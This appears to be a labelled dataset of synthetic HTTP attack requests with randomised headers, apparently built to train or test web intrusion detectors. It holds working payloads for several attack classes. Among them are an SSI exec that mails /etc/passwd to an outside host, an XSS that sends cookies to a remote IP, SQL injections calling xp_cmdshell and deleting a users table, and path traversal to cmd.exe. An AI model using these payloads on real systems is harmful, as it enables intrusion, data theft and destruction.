~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38886
Start - Id: 39564
class: SSI
PUT /iqlebtvshec/d81wime4/s-RWe3Udkhtacces3.shtml? HTTP/1.0
Content-Length: 84
Content-Language: tDtr5E,se,0d2
Content-Encoding: deflate
Content-Location: /1hwr/emtx/uiereiea/2mi5u/mtwfor.html
Content-MD5: dHNhd2lzZXNuY3dhZWVhaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 14:58:43 UTC
Last-Modified: Thu, 17 Aug 06 05:01:00 UTC
Host: 225.1.104.125
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: wt26ais-maoHy5;q=0.8, a-ha
Cache-Control: only-if-cached
Client-ip: 116.140.158.193
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Wed, 25 Nov 09 20:18:28 GMT
ETag: W/"vZcMQZwfRNN7OOS96"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: *
If-None-Match: *
If-Range: "@hNMJ9Go4AKH886z507"
Max-Forwards: 0
MIME-Version: 1.1
Pragma: Sa9='olh'
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: /yieohi.aspx
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Pragma
User-Agent: Mozilla/0.4 (Windows; U; WinNT 0.2; ln-Ge; rv:8.1.6) Gecko/80789497
UA-Disp: 9131,8742,32
UA-OS: Windows 95
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: thbmr; kea9n1=rtuahity
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 11507528452920010282
----: -----------------
~~~~~: ~~~~~~~~~~

%uRxmlv@q=%3C%21--+++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E

End - Id: 39564
Start - Id: 37758
class: LdapInjection
GET /a0bdN/m-mHlGF6@05ivb5/gBkKBBMJ__D5ETOkhR/teT/af2lfTaoHt8tol.tiff?kowwoa=76426&6j4yvgc8o=r+m&4vjaS0=%29+++%28++++%7C++%28+cn%3D*o+%27brien*++%29%28mail++++%3D*o+++%27brien*+%29+++&io0hnu2zm=colEniy&etndgeo=55259734&OsBake=oie54e&eoBAicet=01017155&BLgroup byY3vrJ=loscEho&hojeOi=oMu83&EwhereR-B7BJizxml=7&ee=child&aas4fdsbe7dn0=8evlS+fnnmm&fcn=+gdt&ndii5eijdn4q=603103 HTTP/1.0
Host: 4.101.222.203
Connection: w3tah
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: ntkgr9Sy-n27eeyN;q=0.7
Cache-Control: no-transform
Client-ip: 28.9.182.133
Cookie: 8Hrngauoie=6l1c8;esunftde=0t;cptaoenzhOmtp=323645759;abetween5gCQZ.p0aT=5
Cookie2: $Version="51"
Date: Tue, 20 Jan 04 07:43:27 CET
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: *
If-Range: "d9PISRG.MZaoAeAaY2wC"
Max-Forwards: 63
MIME-Version: 0.5
Pragma: ed9ke2r='It3ehM6'
Authorization: Digest response="42DFa0d9d30110Cd4A8d64beE9770f3B"
Range: 6-
Referer: http://mmmesdga.de/3axi/raoemxtd/5ptO5ciG/RyNin/yoh5uhg.html
TE: trailers
Trailer: Proxy-Authorization
User-Agent: seeelder/5.3
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 633x6724
Via: FTP/6.0 www.irtA4.js
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 753563632869650663
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37758
Start - Id: 41061
class: SqlInjection
GET /h-OLqu/aT8NDi/eHIM5/ch/h6yv/iFmYiframe/dnttrav/5Xhxl@B6PC0xBMkNUp.P.msf?ute5O=49419856&bdieEfna2=%27%3BEXEC+++master.dbo.xp_cmdshell+++++%27cmd.exe&fUitatiyn=lXZ99F&hi=iUtieemRoNrvasI4a&h4e-uL=lnc0&esLgfyntObtod=tn%27eQz&e7fe7eauNndhrb9=6392517&sqife=3804970127 HTTP/1.1
Host: www.ti3iteos.fr
Connection: egarsE
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 29.8.160.212
Cookie: enkaRuuaukaa=3279792;Lsnna2oo351su=hff$;bEor3ierolds=emag]ssew;eIiczhe9=gidereecxta0e7sl;oeewzeflgzcasc=passwd5e9ejEi0Ocftpn;2ectur=tvCf7lToHux
Cookie2: $Version="635"
Date: Fri, 09 Feb 07 03:09:40 GMT
ETag: "ZF70eBKRZsZqsOka"
Expect: ttrhbztf
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 01 Feb 04 07:09:02 CET
If-Unmodified-Since: Sat, 16 May 09 05:12:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Feb 05 05:10:47 CET
Max-Forwards: 39
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic aWlyZWl0NzpkaGRpRW1z
Range: 7-04,570-
Referer: /nnoha/1loi5/gLma/iin918.asp
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (compatible; tsdaq3; SunOS sun4u; ruosaAeen; strdv; epsabUht)
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: FTP/6.2 www.4eehn.js:05626, 4.6 94.209.235.135, 7.8 www.gdfi.htm
Transfer-Encoding: identity
Upgrade: uohtr/6.5, oeo/0.4
Warning: 051 www.iztpe.htm "idahee" "Thu, 26 May 05 08:46:17 UTC"
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41061
Start - Id: 39214
class: SSI
GET /c-/K5wRh5Y/-KmA/hRihsraop5esu/ek-RVMkQgPIw/tHns0niyir4wmnaaes/rI7Z9ZV8XxGBAr9.html?derRrNtBiibo=nymocha%25cdd&epia4twtlae=trwa4&kh=869193657&fra6eboenbit3a=0211075&rV=nncs&oh=ioeuitincludet&rrehfd6Hlwa7ta=c&rdowcrihoeeHy=779427&le8eXOTrkq=wtdset%24mNt%3B&x2qcwaaehese=05&tS=%3C%21--%23email+fromhost%3D%22www.eItT6r.com%22+tohost%3D%22mailbox.dein.com%22+message%3D%22Cl2s+jcNefsy+2ste+a4e%22+fromaddress%3D%22osnr.com%22+toaddress%3D%22eaj.ewu.com%22+subject%3D%22e%22+sender%3D%22tk.com%22+replyto%3D%22cslid.com%22+cc%3D%22YE%22+inreplyto%3D%22aI+szt+m8w%22+id%3D%22auirimail%22+--%3E&jihozina=tbawsxi HTTP/1.1
Host: www.txcks.uk:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: eisvshs-eNtg;q=0.6, ve-umcttq;q=0.9, gofa-eta, iwAwui-izwwi6;q=0.0
Client-ip: 24.82.201.85
Cookie2: $Version="9"
Date: Wed, 09 Mar 05 04:08:20 GMT
ETag: "stS0mrsBNpQBIdeOv"
If-Modified-Since: Thu, 16 Feb 06 13:00:26 GMT
If-Unmodified-Since: Wed, 14 Nov 07 11:38:39 UTC
If-None-Match: *
If-Range: Sun, 28 Aug 05 04:33:46 UTC
Max-Forwards: 1
Referer: /sui3/teqa/nhuM.php
User-Agent: Mozilla/5.8 (compatible; iacIAtfph; Linux i386; c8arngcne; ce65tcn; Ngu8eee)
UA-Disp: 7987,886,16
UA-Color: color8
Transfer-Encoding: rfpta; epfdtm=luasj
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 988 51.40.12.35 "rctnf7iObtnydwbkia" "Sat, 31 Dec 05 16:12:13 GMT"
----: -----------------------------------------

null

End - Id: 39214
Start - Id: 36573
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 95.228.227.146:80
Connection: keep-alive
Accept: video/quicktime, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: LoDoomw-e8, 8o6ntwtw-lNneon;q=0.2, t-q3hilR;q=0.5, Hriev-sohisth, eipvaUa-Uy
Cache-Control: no-transform
Client-ip: 216.64.166.207
Cookie: Srqi4rLgu5ioR2t=reszt;Xo7Tn=4;y_j02OlW=8121813970;iei=doSlo;.22N=33355157
Cookie2: $Version="139"
Date: Tue, 02 Aug 05 20:39:53 UTC
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Nov 08 14:52:38 UTC
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: "kJfKZrr81wD7@7S"
If-Range: Wed, 10 Mar 04 23:41:16 GMT
Max-Forwards: 2316
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Y2k3a3dvZWVuaWVyOWV0Y3RlYWRuZXBNNHR1N21jd2JucQ==
Range: -961935,910376-
Referer: http://www.ftenolo.ch/ilhj/nitkh/T49e5s2l.mp3
TE: trailers,deflate
Trailer: If-Match
User-Agent: tGglttol (1TzQUnESO; z4nhzfkViP; ruLHsxhoCs; r446SGCZ)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 529x915
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36573
Start - Id: 48782
class: XPathInjection
GET /SQNkz.jpeg?5gW=sikhk1o%27+++or++++1%3C+7al%2FasnOto%2Ftld%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D++++or+++%27eeegcs%27++++%3D++%27 HTTP/1.0
Host: 245.146.87.153:1193
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 132.160.12.174
Cookie: t1fatrtE=75911955
Cookie2: $Version="19"
Date: Mon, 11 Oct 04 07:33:25 CET
ETag: "OBU@UM7En1vWUhLG2"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Wed, 30 Jan 08 04:28:44 CET
If-Unmodified-Since: Sat, 01 May 10 03:09:12 CET
If-Match: *
If-None-Match: *
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 499
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: bfgi rtRa=dsun
Authorization: Digest nc=5A9A533c
Range: 512488-28725,-179,34439-
Referer: http://tnh0a.cz/oKOau.asp
TE: trailers,trailers
Trailer: If-Match
User-Agent: t4mtos (orT1BQ; aRJx2TWe.; va@S.L)
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 5.5 www.urzEgpr.js:888, FTP/3.0 159.9.31.147, FTP/6.6 www.searliuD.jpg
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48782
Start - Id: 40189
class: SSI
GET /rqRo8quqHejqocl/fL4nW/l@.zYN99H4qbC/uYQRfkolMYdd7AXEd/n_bw.BYKt/h4n5tlh1sa/1tsock_streamkQpch2FGhhgS/-RG-Z6hz/FdEhlPW@0xlgk/fdA4nde2r2/lF4h3TzgDp.zRmFV.msf?he=bh&oysrEeost=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fmail+++ddp5a.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&EDDaxgoill=9&ivr9b=591&FBj.hi=ssa&5tapfsn7r=itb2zC&W@4MiH-gi=yWQP5I&nm=axsY5Key7&7u_lwgetr2k=%255drop HTTP/1.1
Host: www.fuesopmda.it:80
Connection: eOtgtatt
Accept: audio/*;q=0.7, application/*;q=0.9, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 95.143.38.157
Cookie: tm=9061244927;b.exec1cmd=fse;hCctle4edAaoN=83078;ot=neool
Cookie2: $Version="6"
Date: Fri, 24 Apr 09 17:08:57 UTC
ETag: W/"jH_@cCdr8i3wdxbNazpb"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Fri, 10 Sep 04 11:09:48 CET
If-Unmodified-Since: Mon, 06 Oct 08 05:15:08 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 0299
Pragma: 9=etnsrlo
Proxy-Authorization: Digest nonce
Authorization: 2izi oEesqes0=Ina6nc
Range: 95170-36663
Referer: /qtrnt/bPwoP/sFteueCe.css
TE: gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 2.7; rt-i6; rv:6.0.2) Gecko/52811496
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9646x716
Via: 0.8 52.94.88.247
Transfer-Encoding: compress
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40189
Start - Id: 47174
class: XSS
GET /httpZ0PqbR.js?cpebideooyt=%3Ca++++href++%3D+++%22+++++about%3A%3Cs%26%2399%3Bript++%3E%5Bwindow.open%28%27http%3A%2F%2F171.175.37.175%2Finar.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E+++++%22+%3E&fawhiAdU=9248&iaiwtc=kree&Esvrlia=317037 HTTP/1.0
Host: 158.175.27.213:80
Connection: y50dw6
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 102.236.20.245
Cookie: eaei4cTn0oeve=643;etm6op9bu=2101234359;a1alsawtcoo=sX-;rln=339
Cookie2: $Version="142"
Date: Wed, 18 Apr 07 23:46:35 GMT
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: 51p19@sa8nrs7ro.biz
If-Modified-Since: Thu, 30 Oct 08 03:26:49 CET
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 2190
MIME-Version: 2.0
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: qs6s0b boneeny=Afttrs
Range: -016,1-,67332-47295
Referer: http://dAde6em.ch/Tyoi0c/srnleanr/enSoaf5d/xrinAoua.exe
TE: deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (compatible; Konqueror/3.1; Windows NT; fife0; lefsHixf; otnua)
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47174
Start - Id: 35196
class: SqlInjection
GET /2XXbYj7Q.mdb?se2Thikr0rmtgn8=%27+%29%3B+delete++from+users%3B++++commit%3B++++dummy%28++%27&et=2&sodmo=mEvjZu&WiCeowenDhmaloc=swglliv7iaT&aN5dtldaAoefl=%28e&blocationscript8MSp=694989&5loioii82b=7635&ltgt=917&da8y=db9ehiu&2noraiddnn1am=311973&zte=fNqUHFBZGw7Z&asF2et8eivepanr=78224229&9t=ebncai HTTP/1.0
Host: www.rlyoe.fr:56458
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 78.116.124.236
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="61"
Date: Sun, 23 Jul 06 08:26:13 CET
ETag: "HObdl7XhHCM3PbVXqLV"
Expect: 100-continue
From: htoeiec@jwecgeb0.st
If-Modified-Since: Sat, 11 Mar 06 12:06:07 UTC
If-Unmodified-Since: Tue, 23 Sep 08 10:38:43 CET
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Mon, 15 Jun 09 08:26:24 UTC
Max-Forwards: 01
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM eW9meTd2N2Q5ZGxPdXJvYWlhcGpkZEd5cnd0N2lyMTJubG8=
Range: 7416-9436,-80
Referer: http://www.dspnneh.it/ooita/Sretbmp/laig/hsCnf.msf
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/0.6 (compatible; Konqueror/1.5; Linux i386; uoqeenehi)
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: deflate
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35196
Start - Id: 48675
class: XPathInjection
POST /ntertee4p/c5zXFsWg/mw2ej9u4aa/gfa.5J6UQAKUT67_.tiff? HTTP/1.0
Content-Length: 325
Content-Language: tnmoQ,pne
Content-Encoding: identity
Content-Location: /azex/dw6cf2/u8tE/nrrwnznt.pdf
Content-MD5: eXlubGlpcXN5Nm9hbmlmYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 17:53:57 GMT
Last-Modified: Thu, 15 Jun 06 23:18:11 UTC
Host: 114.98.48.58:80
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: nnioee-lnrtyowt, ell-pch;q=0.2, k4cl-iBedE;q=0.8
Cache-Control: max-stale=36
Client-ip: 94.68.181.174
Cookie: roAl0sujsdcPqh=362160
Cookie2: $Version="33"
Date: Fri, 10 Aug 07 08:49:28 UTC
ETag: "3.OeJwn1snCY3-uU"
Expect: fdei
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 29 Aug 07 13:48:10 UTC
Max-Forwards: 3
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHNlbTppbWhz
Authorization: 4snho cM2brwm1=rdelen
Range: 12-
Referer: http://2Sertmtp.ch/egf9n5eb.pdf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: DtoImif (tVphokWu)
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 2.2 www.adAnfHn.png
Transfer-Encoding: compress
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4JLfAIYL=878&formL_rnCetcjs3i=877831&ed4ibnwka=iP9E5TGDP&yrllEufk=eowhnE6ef&sae2h4dgdi=10&seirMeh3pwtio=3m4ha'  or  stl/wlwa/child::node()[processing-instruction()=88]     or  'woNH'   =  '&us=80&l1SdfodrmqdF=twysRaQqn&dcheze=dR0E_m4F3eME&7@lwinntG3Vl=ndelete&fKwY=nwedjtH32eheu&gr1mot=fBkjc1N

End - Id: 48675
Start - Id: 35961
class: PathTransversal
GET /t.O0OKtZOi/sQI8Ef/63yPrIrm37sEsomp2lta/ert9/8coom6nocajlrn.asp?XG_pE1varwX=+ymrdaeBeiO85s5ca&ty5oeos4ei=e%27hyh&oeSj2PHSYHhall=rGms5H-&allERtpg=s%2Bm HTTP/1.1
Host: www.olAdyol.net
Connection: close
Accept: application/*, image/*;q=0.3, video/mpeg;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: ../../../../../../../../../WINNT/autoexec.bat
Accept-Language: *
ETag: W/"NKbJpRBfD618sorWh"
From: eunh@aicada.org
If-Modified-Since: Sat, 15 Mar 08 04:57:14 CET
If-None-Match: *
Max-Forwards: 78
Pragma: eenhhrOI=u
Referer: /uwlo.tiff
TE: deflate;q=0.8,trailers
User-Agent: kVjrbkFXn http://www.oexd.cz

null

End - Id: 35961
Start - Id: 46567
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: www.epsWair.gov
Connection: leroctl
Accept: image/gif;q=0.1, text/*
Accept-Charset: koi8-r, x-mac-arabic;q=0.1, iso-8859-15;q=0.9
Accept-Encoding: *
Cache-Control: no-store
Cookie2: $Version="382"
Date: Wed, 04 May 05 12:23:45 UTC
Expect: 100-continue
If-Unmodified-Since: Sun, 26 Sep 04 17:44:21 GMT
If-Match: "zAYY1Evwl-b.0JRy"
If-None-Match: *
Max-Forwards: 331
Pragma: no-cache
Authorization: siO4es gyIofoel=aheie
Referer: /notw.gz
TE: gzip;q=0.3,trailers
User-Agent: 2KUGgbhJy http://www.neTbuh.it
Via: 7.2 249.71.194.184, 5.5 71.147.189.28, 0.7 23.75.146.168

null

End - Id: 46567
Start - Id: 41939
class: SqlInjection
GET /Tgnsotew/ocxYmQh2zZCnH/esUJHh/tbvjFw3KvTyCmdhUX/851G/v6_qIlmy1U2ReSIeA4/6mE/doGtolo/Ba/WANRAKIMay/hpuTQ24.tiff?snc=11615&fbi3hnchl8=urluo9asasenc&rwhcitdnD2n7guh=n%24ovImorh%5Dw%3F&aoqa=c%3D7ian+htsfom%29noe%5Boe&pa=Oea5oNnoseiedn&t4uilhnra0d37rt=izji&7Fhttporv=YoEgex3Yddtm5&vreueetne=pjh&bflxsmG=1&.Hr2=73705450&Eueawaotdwtf=4r6Is&3GKC7M=%27++OR+%27oReti%27++%3D+++++N%27+++++&wfRJot4ka4djswl=904656&ubii3cmHese=dNMN_&sqOruxUhGpj=4 HTTP/1.1
Host: www.aeste.de
Connection: eca687dr
Accept: audio/*;q=0.8, audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 148.203.206.38
Cookie: a.iIVI=dprm]einsert;ha=snjr - hossauIkuvbscript a;emo2hmov0sl1sr=43929893;U8kd=sehaoal3Ord0hha;irIh7=997;nr9tf=1184048
Cookie2: $Version="8"
Date: Mon, 20 Apr 09 23:53:46 GMT
ETag: "STLwztEysXjjA5_mC8"
Expect: anwaeesd
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Mon, 20 Jul 09 16:42:05 GMT
If-Unmodified-Since: Thu, 29 Apr 10 13:26:41 UTC
If-Match: "VWo2Hz66RNIx_1jvh6FB"
If-None-Match: "ZIKhWNMq7Xx5Y_lINapC"
If-Range: Sun, 11 Sep 05 23:16:05 CET
Max-Forwards: 7862
MIME-Version: 7.7
Pragma: drermre='shM3'
Proxy-Authorization: aies sesl=fkaciu
Authorization: 3edcps toddq=uwccs
Range: 55660-
Referer: /0hnfibae.png
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 4.9; 5a-pc; rv:3.1.0) Gecko/23866446
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/0.0 www.5sox.gif, 2.4 www.Caatteoe.css, a3TzXn/1.1 www.ircr.jpg:7
Transfer-Encoding: identity
Upgrade: sot/9.3, iin/4.4, eTa0/6.2
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41939
Start - Id: 42264
class: SqlInjection
GET /ead7sVsRs6ib/at2smicttle5mxe/eJ_xqTEXemw/tc/Eenea8eiechcrktcsxl/exj1SyN@fcaDSHFlzV_/pAUV_/it/6lePiuyieteesuAle/nhoefoise5cc5eohct.dll?c41RU=edcpasswddrwtlon9niperlu+ng&icotl=31&se4aaiHte=OR+++%27atd%27++++%3D++++%27++++%27 HTTP/1.1
Host: www.pnwotx8.fr
Connection: anethUi
Accept: */*;q=0.3
Accept-Charset: windows-874, x-mac-korean;q=0.3, utf-7
Accept-Encoding: identity, deflate, deflate, deflate;q=0.6, gzip
Accept-Language: n5cn-tc, y-i3dslh, hnitue-rtoT, sEas9-ToCiiel;q=0.0
Cache-Control: min-fresh=5524
Client-ip: 130.180.209.250
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Sun, 31 May 09 23:31:18 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: eethwr@T5iivnsieh.be
If-Modified-Since: Tue, 10 Apr 07 07:54:03 CET
If-Unmodified-Since: Sun, 14 Aug 05 02:31:43 UTC
If-Match: "lxlWcYMj7Y3KNOJ7c"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: Fri, 13 Aug 04 17:33:19 GMT
Max-Forwards: 35
MIME-Version: 6.9
Pragma: ds=si4
Proxy-Authorization: Digest opaque="7ytlNcaS"
Authorization: tofgh dqar=hn2s
Range: 996351-59792
Referer: /IrTmrey5/e8hedu.html
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: esor/4.9.0
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4514x198
Via: FTP/0.7 114.157.144.189
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 519 207.75.126.193 "hsko3mn" "Wed, 24 Oct 07 13:29:54 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42264
Start - Id: 45108
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 53.232.80.107:80
Connection: ydnsn
Accept: audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 154.211.218.131
Cookie: oPAlien1htzwIA=6t3eE;nuvrtnefesht=e9aas
Cookie2: $Version="1"
Date: Wed, 27 Aug 08 09:22:19 UTC
ETag: W/"Fj-adqaO5kI8kAMZh.@"
Expect: uhxrdEf=ynXs4rl3
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 237
MIME-Version: 6.3
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
